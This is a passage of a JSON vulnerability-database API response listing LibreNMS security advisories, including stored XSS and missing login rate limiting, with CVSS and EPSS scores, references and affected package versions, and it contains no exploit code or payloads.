ub.com/advisories/GHSA-86rg-8hc8-v82p","reference_id":"GHSA-86rg-8hc8-v82p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-86rg-8hc8-v82p"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-86rg-8hc8-v82p","reference_id":"GHSA-86rg-8hc8-v82p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T15:16:34Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-86rg-8hc8-v82p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70832?format=json","purl":"pkg:composer/librenms/librenms@25.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.7.0"}],"aliases":["CVE-2025-62365","GHSA-86rg-8hc8-v82p"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bfnn-xz3r-sfcv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56482?format=json","vulnerability_id":"VCID-ca8g-usbx-5ydu","summary":"Duplicate\nThis advisory duplicates another.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23199","reference_id":"","reference_type":"","scores":[{"value":"0.00183","scoring_system":"epss","scoring_elements":"0.39862","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00183","scoring_system":"epss","scoring_elements":"0.39858","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00249","scoring_system":"epss","scoring_elements":"0.48352","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00249","scoring_system":"epss","scoring_elements":"0.48336","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00249","scoring_system":"epss","scoring_elements":"0.48324","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23199"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/9d07d166b87634091dcf21c62b28f9b42a3118c4","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/9d07d166b87634091dcf21c62b28f9b42a3118c4"},{"reference_url":"https://github.com/librenms/librenms/pull/16721","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/pull/16721"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23199","reference_id":"CVE-2025-23199","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23199"},{"reference_url":"https://github.com/advisories/GHSA-27vf-3g4f-6jp7","reference_id":"GHSA-27vf-3g4f-6jp7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-27vf-3g4f-6jp7"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-27vf-3g4f-6jp7","reference_id":"GHSA-27vf-3g4f-6jp7","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-17T14:56:42Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-27vf-3g4f-6jp7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83471?format=json","purl":"pkg:composer/librenms/librenms@24.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.11.0"}],"aliases":["CVE-2025-23199","GHSA-27vf-3g4f-6jp7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ca8g-usbx-5ydu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46432?format=json","vulnerability_id":"VCID-cvn6-ggwj-9fcm","summary":"LibreNMS vulnerable to rate limiting bypass on login page\nLibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. In affected versions the login method has no rate limit. An attacker may be able to leverage this vulnerability to gain access to user accounts. This issue has been addressed in version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-46745","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00787","published_at":"2026-06-07T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00782","published_at":"2026-06-09T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00781","published_at":"2026-06-08T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00789","published_at":"2026-06-06T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00786","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-46745"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/7c006e96251ae1d32e1a015b361a7bfbb815c028","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/7c006e96251ae1d32e1a015b361a7bfbb815c028"},{"reference_url":"https://github.com/librenms/librenms/pull/15558","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/pull/15558"},{"reference_url":"https://github.com/librenms/librenms/releases/tag/23.11.0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/releases/tag/23.11.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46745","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46745"},{"reference_url":"https://github.com/advisories/GHSA-rq42-58qf-v3qx","reference_id":"GHSA-rq42-58qf-v3qx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rq42-58qf-v3qx"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-rq42-58qf-v3qx","reference_id":"GHSA-rq42-58qf-v3qx","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-29T14:08:45Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-rq42-58qf-v3qx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67799?format=json","purl":"pkg:composer/librenms/librenms@23.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-46745","GHSA-rq42-58qf-v3qx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cvn6-ggwj-9fcm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55916?format=json","vulnerability_id":"VCID-dff6-r5mp-p3d5","summary":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Alert Rules\" feature\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Alert Rules\" feature allows authenticated users to inject arbitrary JavaScript through the \"Title\" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47525","reference_id":"","reference_type":"","scores":[{"value":"0.07363","scoring_system":"epss","scoring_elements":"0.91875","published_at":"2026-06-09T12:55:00Z"},{"value":"0.07363","scoring_system":"epss","scoring_elements":"0.9186","published_at":"2026-06-08T12:55:00Z"},{"value":"0.07363","scoring_system":"epss","scoring_elements":"0.91861","published_at":"2026-06-07T12:55:00Z"},{"value":"0.07363","scoring_system":"epss","scoring_elements":"0.91864","published_at":"2026-06-06T12:55:00Z"},{"value":"0.07363","scoring_system":"epss","scoring_elements":"0.91863","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47525"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:00:57Z/"}],"url":"https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405"},{"reference_url":"https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:00:57Z/"}],"url":"https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47525","reference_id":"CVE-2024-47525","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47525"},{"reference_url":"https://github.com/advisories/GHSA-j2j9-7pr6-xqwv","reference_id":"GHSA-j2j9-7pr6-xqwv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j2j9-7pr6-xqwv"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-j2j9-7pr6-xqwv","reference_id":"GHSA-j2j9-7pr6-xqwv","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:00:57Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-j2j9-7pr6-xqwv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82814?format=json","purl":"pkg:composer/librenms/librenms@24.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.9.0"}],"aliases":["CVE-2024-47525","GHSA-j2j9-7pr6-xqwv"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dff6-r5mp-p3d5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41442?format=json","vulnerability_id":"VCID-f6gw-kx8g-r3ac","summary":"Cross-site Scripting\nIn LibreNMS, a stored XSS vulnerability was identified in the API Access page due to insufficient sanitization of the $api->description variable. As a result, arbitrary Javascript code can get executed.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-31274","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.125","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12528","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1615","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1616","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.16105","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.16076","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-31274"},{"reference_url":"https://community.librenms.org/t/vulnerability-report-cross-site-scripting-xss-in-the-api-access-page/15431","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://community.librenms.org/t/vulnerability-report-cross-site-scripting-xss-in-the-api-access-page/15431"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/pull/12739","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/pull/12739"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-31274","reference_id":"CVE-2021-31274","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-31274"},{"reference_url":"https://github.com/advisories/GHSA-2r2w-jrh2-p4gr","reference_id":"GHSA-2r2w-jrh2-p4gr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2r2w-jrh2-p4gr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/58951?format=json","purl":"pkg:composer/librenms/librenms@21.3.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-1q9d-aqn7-67ad"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-47n6-dbkp-gbb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-64kz-hnxr-vud5"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-76bn-2u1y-kqf2"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bczm-p4wu-efdm"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-m1hm-kqrc-3kbj"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-wkt4-vdr8-mkgk"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@21.3.0"}],"